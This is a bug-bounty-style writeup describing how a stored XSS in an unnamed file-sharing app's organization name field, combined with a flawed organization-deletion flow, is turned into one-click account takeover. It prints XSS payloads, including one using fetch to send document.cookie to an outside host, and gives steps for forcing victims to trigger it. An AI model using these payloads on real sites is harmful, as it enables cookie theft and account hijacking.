How I turned a Self-XSS into one-click Account Takeover through Bad Business Logic

Tushar Sharma

Hello folks,

This is my first writeup and I wanted it to be special so I decided to make the writeup for one of my most interesting finds. Please ignore my mistakes. Let’s start!!!!

As the target application does not have a bug bounty program and does not want me to disclose the name of the company as they don’t want to invite traffic. I will refer it to as

About Target: It is a file-sharing application where a user can share files with anyone, make or join the organization and teams. Also, there is functionality where you can make an organization and add team members by adding their emails. The team members are automatically added to the organization without accepting an invite and you can share the files there(Weird …..??)

About Vulnerability: The vulnerability is Stored XSS to steal any user cookies. The severity of this vulnerability is quite high because I can take over any account on the website which I want and as One click is required by the user I also made the click Inevitable due to the application’s bad business logic.

How I exploited the vulnerability: I usually test the main app functionality while I do the recon in the background. I quickly signed up for an account and tested for email verification bypass, open redirection, and similar bugs. I usually don’t test XSS but I put this payload [‘“><img src=x onerror=alert(1)>] everywhere, where I can, to see the response from the website. When I put this payload in the organization name that triggered and I got the beautiful popup. The first thing that came to my mind is to add another user and try to alert their cookies.

I made another organization with the payload [‘“><img src=x onerror=alert(document.cookie)>]and invited the 2nd user to alert the cookies. Now when I opened the organization with the 2nd account nothing happened the payload was just filtered and properly encoded. I started putting many other payloads in the org name field and attempted any functionality that the invited user can do on the organization but nothing executes the payload.

As I said I don’t give much time to XSS then I moved to test IDORs and privilege escalations issues and after 2 hours of hunting, I only got session management and No rate limit issue.

I finally decided to go back to test the XSS because not every day you get a popup. So again I invite the second user with the org name with the payload. Now as an admin(1st account)I deleted the organization and the organization got deleted then I navigated to the member account(2nd) the organization is not deleted. So I tried to leave the organization and the payload fired with an error.

This error occurred because the organization is deleted by admin but according to the business logic of the application the member is given time to back up the files and the member cannot leave the organization for 2 days. This error was vulnerable and my payload was executed.

Now I took help from my friend Shreyas Koli and built a payload :

‘“><img src=x onerror=fetch(‘//’%2Bdocument.cookie)>.

Now the final steps will be as an attacker I create an organization with the malicious payload.

You can create several organizations to force the user to try to leave at least one of them.

Organization Created. As an admin/attacker Delete the organization.

Now victim will see that he does not belong to an organization and try to leave . As soon as he clicks the left button his cookies got alerted and transferred to my burp link.

I made a good report and sent it to the security team. and got a reply from them.